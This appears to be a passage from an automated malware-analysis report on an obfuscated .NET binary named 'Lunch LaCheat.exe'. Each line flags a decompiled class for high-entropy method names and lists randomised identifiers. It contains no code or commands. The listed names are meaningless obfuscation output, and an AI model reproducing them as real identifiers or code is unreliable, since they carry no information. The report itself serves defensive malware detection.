                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, IYPXUgwBGoP6ag9jkCy.cs | High entropy of concatenated method names: 'c2HFvottUIahn', 'woorDbdXE0xTAYhMF0X', 'uNoJwbdW3AWhGTAQrxp', 'VnGffcdwfhM8aLCcLn8', 'SdFVEVdfu82GL510GMs', 'H9mrWodm0RYjQ0ahgOh', 'IIbfdRdixl71rfT5QOD', 'vAv2eFdPIA5BilCQAop', 'axohCLdl4aoI35uNqyP', 'rPVPQkdrFr6cLrseYA7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, KhVMlxXdSTGZrYZBTyq.cs | High entropy of concatenated method names: 'kjMacqd8Y1', 'dFM8QiUbOiNT3Wlx0o2', 'pAyrlDU1lyp62ZjBqB9', 'C38oNPUj1lyraUDysZK', 'w6QCLhUF0jmyoJeOycs', '_1fi', 'ILXeQHPI2t', '_676', 'IG9', 'mdP'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, kMDXZWXajKvT3fbPySM.cs | High entropy of concatenated method names: 'so7OZOmXcS', 'seBO2wr13U', 'Wx0OBVxFAh', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BgAO6GC7rc'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, t7eqoCq0pyA24xXUAbH.cs | High entropy of concatenated method names: 'evhqoFZ4P6', 'JsQfJC9ns5pCW5j6Tnf', 'JAoZp69QZvQqimDDTpb', 'pCKSdX95nALImpr7vLg', 'Y3k8MI9cPRFS30v5Oyr', 'UVr5F79BUJGC0yGL74u', 'wo6Vld9IE4g2E8H1jLL', 'B63ltQ96yh2GL5gwWIl', 'oiAqjLbTCJ', 'ECTyE49qwm3bGTHUN6L'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LdmVhiXGwe9HapiwJ8M.cs | High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TAXO8Cmnut', 'vrLOhm8dlH', 'lcQOOs0Sxx', 'zIYOeFJCIF', 'R5aOahOv5j', 'PslOCWUtKC', 'et4lt6TCIDuEr6rKuQq'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, UhmLkBf9fCvwgVYUfIA.cs | High entropy of concatenated method names: 'qlhUCmLkBf', 'AAWA8rw8JUlo7bj2IaY', 'aX3CKrwGKWf2XWiRpaP', 'KBeZMSwJJIVXm09Apou', 'hyc9HQw2JR8whLRhLc7', 'n00GNtwzblx8nC54JSQ', 'aeNhdAf5DcNWWJ3tCm5', 'kJ3fdTfcnhvxlTjh2c9', 'xKmModfnBy0oOACwRu5', 'hdv74ffQZ2tmZ3HEhpS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, GmeW25faKmNu3TDH8lC.cs | High entropy of concatenated method names: 'm6ItLu1ZjH', 'WVLtkWQbIi', 'iQ4tzxuYYV', 'VkDUyUfoJr', 'varUq8YInh', 'Bv1UfxxBty', 'jpeUMd3Gwn', 'ffrUt61Kw5', 'EYYUUZrHdC', 'KfNEPTWYJNYa4KaQ8lI'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, AM3dUaMPMLKtx58w5dK.cs | High entropy of concatenated method names: 'AOVJWefvU5', 'VUSJAFTekW', 'QAXJopur5Z', 'f8kJE1fDDg', 'mNZBiUDLQdo7fX17ZBY', 'wGIy5jDMdiueJuQpas0', 'W3TALFDEgsuXNX9Z2is', 'AT5QLEDOyuw53EOOgdu', 'pruHwBDvqlqlFTXC7gs', 'gww8HDDCKEfkOOWGwbE'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, EU7jgPqZUfCh0MEvB0O.cs | High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'JTKaa4777mfR36hCoHA', 'CpD0lE7yQdshseIwquJ', 'iH8cej7qsWR75prafpN', 'IZHsn479V12L7VHBJSQ', 'BgoW2570jjuUXFQBHNp', 'DUnnj07Ato88UNW52uw'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Ahc13dEy5KVP0BqE5E.cs | High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'hAMy1mBUDwEx2rXOl6l', 'loUJM1BeEu05t5cAgSC', 'xLwah6BdvRdcaJCgeFK', 'zIsF8oB4Ohst4mZHOyW', 'mDtiQxBZULvupYnONMx', 'vF1ADbBaBIOnm7Prudn'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LgEDIqhS04Car44Mop.cs | High entropy of concatenated method names: 'NJU99NQHq', 'RsnpVi0BZ', 'aAbdKrsDq', 'N3wegKcpgHwR2rr6u6Q', 'pYUR3lcEmMv2RIKJGbt', 'RYkQYscCtfQBwZ1qBsZ', 'py1TVDcoUrIscPVoM4j', 'n1yueqcu6FT4hHhRbcA', 'ejkrQIchrKMglcNdyH3', 'o80D58cT8bTeg0STeY8'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, TKA1axtODGwCsrAJYh2.cs | High entropy of concatenated method names: 'Dh9H1AxGpk', 'ULMH9RCGyd', 'Cx4Hp0QPMN', 'Ws7HdhJ44i', 'x8EHc1HL9o', 'rvHxM6glc1lvMehJWYV', 'RM55FGgfhTvBvTKUYZc', 'UOdxNegmV0i8bkOLHSx', 'gx7WIkgrCmroZnH364u', 'PgomNSgDf3esDNSHfV7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, f8k1fDtZDguyRu368hC.cs | High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, SUHxo9tNj7gNTsIAV05.cs | High entropy of concatenated method names: 'ASg78iHlfC', 'JRI7O6QNB4', 'oHo7HOv6uy', 'PSQ7PChfg4', 'GQh77QXcEE', 'luM7g4nfsA', 'Rp47S9GewM', 'wvG7DiND8G', 'KHj73v7iMn', 'MNF7s8pjhS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, B0A2YIMzsWk7TS3uGdI.cs | High entropy of concatenated method names: 'QTZ2eYxb1w', 'MXr2aN0rRt', 'WmV2CoLnj2', 'TScQVcxhu1qXlhrMr6t', 'PjP3fgxTEVoLdOOUAtu', 'mS7e1FxokiJEbe4YJnK', 'dplGFjxutbvFpXvFTTi', 'vRoDi4xU3vHRgsJ91bH', 'wBhsrsxeOfq7uBa21LJ', 'ciuqhXxdPoS2OJgR3ju'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, yhRfLWt3k6bdGWArgmH.cs | High entropy of concatenated method names: '_7zt', 'Y2d5s7UQpN', 'L1I540HfXH', 'faI5VYRTcn', 'wS15I7tZAN', 'U1c5mxNXvh', 'Hg45uEn0ui', 'YqOicPk3qIJeIYTLNQ6', 'RowPfGktZ4vKdmJ6ayU', 'rOFyxvkDgj86hX7gl20'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, eCD4fOt5DPq948iwBGO.cs | High entropy of concatenated method names: 'erL6pJNwl4', 'tfI6drG2CP', 'C6N6coIPAf', 'SUI6T8omLQ', 'oLr6Kbe96U', 'MWA0wjHGk5xg7L7C3eq', 'Cic4tYHzZ5EcG8VYmr7', 'X7giRhH2Nb6hPeHOJjT', 'G7dIpfH8Om3Lwn6sjKJ', 'vTaFAWk5NyM67DkM9Ki'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Vb95fHU00YbhYDyu0gn.cs | High entropy of concatenated method names: 'qw5RjX5E4u', 'WK7RxA3kvh', 'DlyRFaKs7R', 'zaAZ6uCuOTrQQCO836R', 'dOL0plCpeVIMNhkew1d', 'BXmpOuCoUwnUe5BCqio', 'P6QUBJChv4C6xiEa0O0', 'jKMcgZCTWOkPwYQSAdq', 'pxHyKRCUvWKMttg2kcZ', 'NNfEdpCe43h4k4Xao3h'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, VMFniGxPuBqy8bufcO.cs | High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'zPLBIJI6EAx2AuarbQN', 'a8VU2NI7hlQURo19q9X', 'Sem2FAIyQ0lGs9g5Jv3', 'mNTkmRIqiiVNQEglCu2', 'VHvEa4I9VtmwOVg7hUC', 'RFU3TgI0utCXWLQGj4R'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, qlXAoh1gngc2opxxXE.cs | High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'aylWtpi92', 'bkRHbAnMkiHllHmNCPr', 'zfe9y2nEZHlKM4NJHNc', 'ySuEJOnCRbb7HMHeWFd', 'bjiC8nnp0SmrslLefZW', 'oTUm6dnoR9vFeGY0KSB'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ScE4clqkd8XEwfbUW0Q.cs | High entropy of concatenated method names: 'OH3fmYWQbU', 'njgfuPUfCh', 'CMEfRvB0Oc', 'lYYCbQA0gq0hdyRggSO', 'jA3j8uAqlS3WG0i99jj', 'BAUOatA9ivHQqX57BbY', 'fPfRJmAAPsbnU2HAHFy', 'zpOlMpARosx03mAD4Fm', 'xatfDuAiR0j7IYdrLRh', 'IACDsBAPpipjifvZXUl'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, USnMqttFK6BlomrJdIc.cs | High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'GjkP7CybKT', 'XmhPgyvQWU', 'r8j', 'LS1', '_55S'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, h6vuwetSTCvG7UVGrTy.cs | High entropy of concatenated method names: 'QXj5tbqNGh', 'EHN5UH0y3X', 'Niq5XVfIUT', 'pZaAH1kw9m1BCP98Ddp', 'dYDMN1kfqlvFXkd8234', 'lh7iiZkXQpwkl5pn0BU', 'gVrcfykWg6G2SRfcUtA', 'sAYATckmVN2tioX9gJ0', 'uSPpnyklCeAGqHelk9u', 'G3Zg4mkrR64KQ4AJyYl'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, r70NTtMtM1uhGa8tvNh.cs | High entropy of concatenated method names: 'ba8wnj0pnM', 'dQ6wWL6GZO', 'HPBwAC7FAa', 'qqmwoRnjG3', 'TsdwE0WyU9', 'icWwjffg5Z', 'J8irNElFIn7Wn6y2175', 'U6uf2Nlg2avZgNruTKk', 'QeO9Nllj2DyE3o8HkOT', 'UMm4x9lbpKZ5oTtANUS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mBP0oLLioGhwXAdkrn.cs | High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'RD4vFCIKLIHllJerkY6', 'uvCP9wIYLrArEjhk36T', 'l3o5nHIJZ6Zu4y1Gyib', 'mo1tbvI2Zx5AqH6r5ZN', 'FIakaWI86otfJgW9sxD', 'cDlgDBIG7OAMCa9t6E0'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, KHdCRefmbkXs3K6gETN.cs | High entropy of concatenated method names: 'U2ttViaejt', 'eHqtIYFZSi', 'Yf8tmR0mCh', 'dKftuZJaha', 'YNotRMtWH5', 'vAiHkRW5DW67my42vGf', 'DGMhAhWcfBjt63gg8Ji', 'iFGOBvXGAF29XqhO46h', 'BQh4G0XzrsbXQeLGmKA', 'UH7Zw5Wn3n8D3mhT9rP'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LMjjpmqliahLUcLnGsv.cs | High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'KfdqIZ0a3759TGBu5PR', 'dc2KE40SB5kdmDO36nt', 'WukPRJ0sGktsPStdt1N', 'XWbLkl0VAVrl3ZWaPF6', 'w2H7td0KNICT7stNJ3F', 'xYLhGd0YOhdnj9i3HJK'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, fttbW4MDcJoMNSH5luT.cs | High entropy of concatenated method names: 'qJXJYpW99r', 'J2gJldmVh1', 'GHjJvt3wrp', 'bk1JN6UCD4', 'bODJiPq948', 'hGmGUUN6i8Q9mATGUco', 'k5v9pUN7Av8ih4vYORN', 'mv1KLuNB9ITBxXnAx9k', 'k15qJMNImxrfpVGCfQW', 'JcDtgkNyl5ay1YPElJX'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, DAsN0KqaOCtdgS3tEyf.cs | High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'M6bISbqElc2gBTqnY69', 'gv7VZ3qCnc1PaSvp2Ir', 'aPJVY0qp1Ytv8ghp49E', 'hGXX9LqovAi91ujCX4d', 'YmHOsCqu74Uti3CRdZN', 'SlDBkJqhuCrggQ7uDub'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, UlZg75qsQwJiM21bO65.cs | High entropy of concatenated method names: 'lHIqCRnmAO', 'vMgMF0yfJ8TikhX2JrH', 'y0HOBuymjT37Y7qUx2h', 'w22e1AyWFE8HZhM0DNL', 'ANdsv9yw6wD9muTxSB5', 'twyKcYylT8BWuQF1YcT', 'saTZbGyrug8BVIVsd20', 'P92crFyDmlOTLF4bFuE', 'LNu749yN3gnq0LspyUI', 'f28'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, B0aWXNMnlXn2BLGMp6h.cs | High entropy of concatenated method names: 'sg9', 'Ulq51Ji3mp', 'AJXZLAKlpa', 'thE5H3BDVC', 'sTtO0B3ZeCiOkoYtyRi', 'fAqy4B3a2PsP4Csb2GE', 'vtMweA3SARa1hcsJZst', 'OiSpfI3dk3Lt4obXW8F', 'AJuwmF344OoGZRVvedm', 'YawJpm3sYwIUgtktTEe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, gI07OVUv4aW9pt78401.cs | High entropy of concatenated method names: 'wsB8tf822i', 'VUf8UA23TH', 'dQj8XeOEdi', 'LwO8w8sMco', 'sR58JxMG3p', 'kfR8ZR3xYr', 'fmk82qvu9R', 'riu8B4g1M9', 'kQk86mZJwj', 'RKe85rMYEe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | High entropy of concatenated method names: 'kB38y8dk5oW2xdKQBrP', 'G6ZbBJdgUO6CLx48d5K', 'dDPudsdxa6pJGbmnmKi', 'b0GZXwdH7ygfxCFOP1w', 'BkAGPB7unW', 'oZOOPmdb3qMR2OdZTra', 'N4YP0Cd1iuhaXhBVh26', 'NS4jk6dO3LJwCCJHcdh', 'cjeMFidvcwPeWVu3eAE', 'G4SHC9dLD6xHeQMsvhm'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zjoE3wqcjVQABWnuZwJ.cs | High entropy of concatenated method names: 'LDwqLbeMqa', 'bU33lM9CY6QbqkUuSXQ', 'edxOpB9puVMW4WRBXYU', 'u2okGP9MG0fEDvWvjeu', 'kDPEj09ExKrMrEl81QS', 'dv3GOp9o4yBpxyypgav', '_3Xh', 'YZ8', '_123', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nldwCqME01ywJTeITCX.cs | High entropy of concatenated method names: 'oYo', '_1Z5', 'v0e5Yer2Yh', 'gGg2tdWOIW', 'hBV53OseBt', 'cuvwY2tiF6T0xlmhlRC', 'DbBHZOtP9vQ03rGX3cr', 'zyxEwctXsbdURV0wraa', 'T257FqtW9ce8SpJEWSC', 'SFoZ3ZtwJPZTejL75Gm'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, jVQRA9qILNDR4ueVNdL.cs | High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oktDTryxsKvOiykeSyp', 'aSXGyWyHbHVuvujaXVW', 'j9DsnTykvOXD7VqlgNy', 'VsEnKxygPhd1RbnlKLC', 'f2ttHIyjk17CiWnkXlh', 'LBdBwxyFOHpWMnIyeFy'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ykUT5HnIRnmAOVRT6X.cs | High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'eY2MbUB0PecUyh3V2wW', 'd8pkn0BAPJITW9DDqcq', 'Tv5aE7BR4L0wAL8jA7R', 'mMPINVBiepktgJ302Pr', 'M4gHVpBP6fZUQTFsMM1', 'cPKUSUBX6ioO9PN9JUd'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zy6GHpNEirDwbeMqaG.cs | High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'YfPN9GIe92ZZpZ9hmoH', 'ADWV0RIdwoLO8FWq0Ir', 'c0DhSCI4rJqavKqnUCf', 'wHH5RqIZVucg3SkrGbq', 'pujxo0IaN1clKxhtVbC', 'XqoEwiISvg6R27NyE7H'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, j8yowCfSyTNdR3Qg4Jh.cs | High entropy of concatenated method names: 'z4DMLvf7yf', 'zwLMk4iAhK', 'IYjjs7PluGqUdZbLiIU', 'o2O2kGPrC5Li2fny4MT', 'onGWsrPDJhjoSEs4QKE', 'ECpQQ1PNIZyjHTTKWXl', 'skwvxXP31xojtFQeYcO', 'OUkWPoPtURsH0OCLxTV', 'SVewE2Px9vtFQksqGyF', 'jJ24xJPHrOK9SaMtxTS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, X1FXHctVq7kE4pJRmYh.csHigh entropy of concatenated method names: 'LkY51lKamo', 'apE59apTLb', 'l185p0gr7V', 'oNr5ddQGeP', 'v1x5c60a9L', 'Uuty8tkM18wp61hrkDf', 'VeRQjGkEHw3Q8asgmVu', 'Fbw6jrkvF7gtX0xJpVa', 'lC0gFckLZ18puOV2AUc', 'AMtCArkCcB6NLMt5FHW'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, XfZ5nTqO2eBgWgje4xu.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sTi4UqyGRJftkS1ZHnt', 'aNQkoEyzVITyOnD7t8F', 'X8PHJDq5Jo8W1Z56NsX', 'JnVY21qcxIgQ4hFRZVs', 'lyvonuqnw8f7bxLb3DN', 'vVOG7WqQl5pajghAZns'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Lt3DSvqMxZcQ5oZBmim.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'ti108i6bPMh7NNdD0Fg', 'gVVhxC61nmmPWuhSTk4', 'DQbUm86OGZcdm3KKjFo', 'KRhhys6vb76PXjs3uIn', 'gJmdVq6LVSYWZoOx71F', 'HOeuRI6MHyj8SAiueEi'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Jb85v1sq6IWCtQ7Vqu.csHigh entropy of concatenated method names: '_0023C', 'IndexOf', '_0023D', 'Insert', '_0023E', 'RemoveAt', '_0023F', 'get_Item', '_0023G', 'set_Item'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, vK3PiltUTHMLVDrDT8n.csHigh entropy of concatenated method names: 'FBr6S3mhmp', 'mvGkoXHmahBtZ5DeyAP', 's3yI1IHlnbYWQ0cDjsW', 'tubhBvHwJMxNiUtCSoD', 'f06gDqHfv0377bFQKfj', 'tXv20oib2p', 'TDc2G9dTCL', 'wwZ2bbYM8P', 'edZ214Srfu', 'q8N29cRarq'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, q8LHkBqBZc0BmxvQWYH.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'dc2h7s7l2bZ7ac2bgs5', 'XXkXrf7r24Mh4osJaef', 'BJKaqZ7DZBiopasUQXP', 'vOvdmP7NkIm7avuOprL', 'lb9aJS73vL1Cn8CVhEV', 'O9TKQq7t156fMSeGKyv'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, VwsI0eXAjxgDO5eO946.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'QhACZG1nuJ', 'gnxC2qDR75', 'xgbCBXBdC6', 'EC9', '_74a', '_8pl', '_27D', '_524'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, z8gUbRX871YUO6KvEjH.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ix9Miew8MmrhPUW6iG7.csHigh entropy of concatenated method names: 'A7EGRZWto2', 'MlUG8wO8sA', 'zjHGhA80h0', 'k1tGOFYPLo', 'H8kGetCy2q', 'cIMGa7LTR1', 'yQLGCpAmy2', 'nkHG0qyIkQ', 'h4SGGYebre', 'lokGbybUQ7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ctiO1aUb80GXStvVQ3f.csHigh entropy of concatenated method names: 'sFTRYKjJvv', 'YFXRl2LSuZ', 'igKRvQ9RUr', 'aKNRNk5oQf', 'KGWRiMrEoo', 'q2hRL9enh2', 'vNOWsDCZGATwrY8gMq6', 'PJwbB8CdW955LNt4iEj', 'rvCMDxC4DFbmX1a1HI4', 'CaATkkCauyj44NtKGXO'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nhbQX4wTCE0caeKIHB.csHigh entropy of concatenated method names: 'EQXH4TCE0', 'Yi8356vripC8ilFp0f', 'SSvq0R1MYTyTJUTY0G', 'HWNHdtOUXBWVAWXdIX', 'L0xsrELxFiDu0W9bFR', 'AiWZ4IMeVAmJ4F6jb1', 'OIIfH6Xm7', 'qkJML7FH5', 'wxltexwLw', 'mafUaGdQV'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Yarf2vfPQwRKas0dOld.csHigh entropy of concatenated method names: 'YcBMNnVE0A', 'bFKFfAPQdJqDSLdxsRN', 'Ui04YvPBQas2ifmOoHO', 'FOsO4HPc1PT3R8IgsnS', 'VKZ4elPnV1yPfUV0Mae', 'sBfOimPIjyexNZHuxP8', 'LsGyCqP6Y0Sw1YbN2SJ', 'Ga87hZP7Iypv8oK2YEZ', 'j6PrYqPyXHrUnWoAJsd', 'mwpOhCPqk5ZNWH9xbCN'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, RSx3mxln0wS0orPm0E.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'l2h1jXIjN1EHXRcdH8S', 'o2Ni80IFl7jUaGDcfSK', 'AVxZQ1IbsIs8ixlkEH7', 'rvguNmI1uOZvsnpN8hn', 'yiOQn9IOE4VjSvBjfxx', 'TZRaJjIvBLBitp2ap4b'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Au6u9NXX2BPw1dlx1cN.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Thw6BMqwvwHF16riBkP.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'DXXyLe6YjtAoUAlR400', 'IsQInp6JBBf6Bax69i9', 'RrgwEw62ZWLWR5FdqKm', 'nJmgoR68sn0tOY8nH2p', 'YDje1g6GePELr76Akld', 'UkWNYr6z9qJd2t0UiHX'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, OKOFf3AyEOTeQ8sF02.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'HHARG2BfYWdYMpdL3vl', 'yqnvCRBmK9is93gbZw5', 'RAdw8XBlerWmPNMHejV', 'tBcVD7BrGUwGmKKlW1U', 'V53aXFBDCHnwZbTRin8', 'fjI1qBBN3EMlGrTwMVj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, iWMFUTm5Qgip1Z9i3E.csHigh entropy of concatenated method names: 'f1HRteHcI', 'KLh84nVgP', 'wkfh2Pa3I', 'Tp5OiNLJJ', 'tybeBsmlv', 'FegawM7Yt', 'Ku0CqOYbu', 'PKpGNPcyg7aCyWqRSYn', 'pV5Pahcqqo1MKYaLtGX', 'RpdF43c9ENdB4rxPv91'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, suwuZqqUaCC4bv2jsNt.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'sAHwBF6dCOL3BN4shTu', 'dLDqJK64nHlexilVgsx', 'yJLm8S6Za6VXOQa402f', 'aIAlpp6ade7u8qbGyOX', 'PSKl916S7BgsIc6XHEM', 'KOA13J6sJdCf3N482rU'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bUKS09MsXqrMAhvIgjN.csHigh entropy of concatenated method names: 'LVkZ7ydJL1', 'RXHZgcq7kE', 'spJZSRmYhS', 'nYPaFINUATgOmD2wdj3', 'avDaptNhqOKZG3eGdIL', 'OR93XGNT6Xj1A8YDkQk', 'KmXl6UNecbQwCXrqvXN', 'yJ6ZXvuweT', 'CvGZw7UVGr', 'JyaZJQgawe'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, r1Nd7VMgjpfgH8UhQxo.csHigh entropy of concatenated method names: 'CQFJxOA333', 'GPlJFtAkWb', 'twOJQmTxvP', 'zFOKUnDdD04qbhNC0yh', 'WHPR53D4h4jXhm4myGP', 'RDpdGxDZmn1Zwm7je4L', 'AtyTDdDavXYI4CjUynr', 'rsElwBDSV37y8BAOoeX', 'nYNKVTDsrCsQdvXY4Ar', 'MwpeOGDVh3NZsXZT7X7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Fioc1Eq5kI2Wt8Yw2K3.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'pe8Y567gq5BdfHvRsHG', 'fycxlI7jSB8cgfDGNOp', 'jCO1mL7FZccHMJ3VyCm', 'kIkAFj7bdSYdMSAh8Np', 'kar2iO71X55aoCpyS4x', 'enfFTM7OVdnv3amTJ84'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, dVUBQucrV6vLHbsrlB.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'Sx2g3IQEkNSyapVAdBm', 'ptGwXiQCWH9aZxJjeOS', 'R6XEt4Qpghm4myNgS0A', 'EnaSu1Qo508gWs5LXdV', 'oZdGeGQuOnEbNesrKRw', 'nDI3xxQhPTyyaEyjr35'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bWvKHFeX1fCoZwKOW0.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'D4idk5n0rHxOIMbXBpD', 'j99aY5nAJp7JVUikfi0', 'kjbyW8nROFsLNZpHQJ6', 'jTMKvkniuyvkpf3VChZ', 'YZHjornPXX4SAkLd81W', 'slmX5gnXcGpNtg8Lc7I'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, gKJnY3fffZyAJh7UTXY.csHigh entropy of concatenated method names: 'RUNfjSb3Gb', 'qYlfxlZg75', 'SwJfFiM21b', 'z65fQeKRl3', 'jvXfYxaNYC', 'NTOflNCx0T', 'JFajgeRfh54h82epLwk', 'IXH5CyRmGleZOV1rM2I', 'Q73ZJmRWIuIR6u6KGDB', 'Od9WKuRwpETgG1aBejd'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, v1H9NwqEOJDUB1tm5YX.csHigh entropy of concatenated method names: 'NKxfBJ9gEb', 'z1Tf6PI5PK', 'WyaLBQ0AmR8piRUljVY', 'xAvxBW09gEq0CG7AUy3', 'JgGt2K00mDjaXfxpECQ', 'CYkRpL0RaLhodWbkQKH', 'HnjsTg0i36s9WZlKYfM', 'L03M900P13ChX4MvafH', 'TIpof00XSGngI1vTvvj', 'SF0ZoB0WgDTwMsMjVcH'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Fnr6ywMQNBPcTXUFQeh.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'IT02B0NaA8', 'Qjt5q4hF13', 'Cyo2606ER3', 'vko5IrU3jc', 'sDiMNXtp85QCCZP79fg', 'rsYW6lto7dgftD01ift', 'r0Su44tE2uY5h1WWjtd'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wqRwrbX1J1I0lijql3J.csHigh entropy of concatenated method names: 'qyJ5TjUBrcELHDypRVR', 'okjImSUIpVSNypJkCGa', 'LULUEqUnkXXGocgk3ky', 'mRBREgUQCPKKyohB9iq', 'qjpO9d8jf1', 'WM4', '_499', 'lYROp9AR7q', 'xQjOdZft1Z', 'TfaOc8KN6Z'
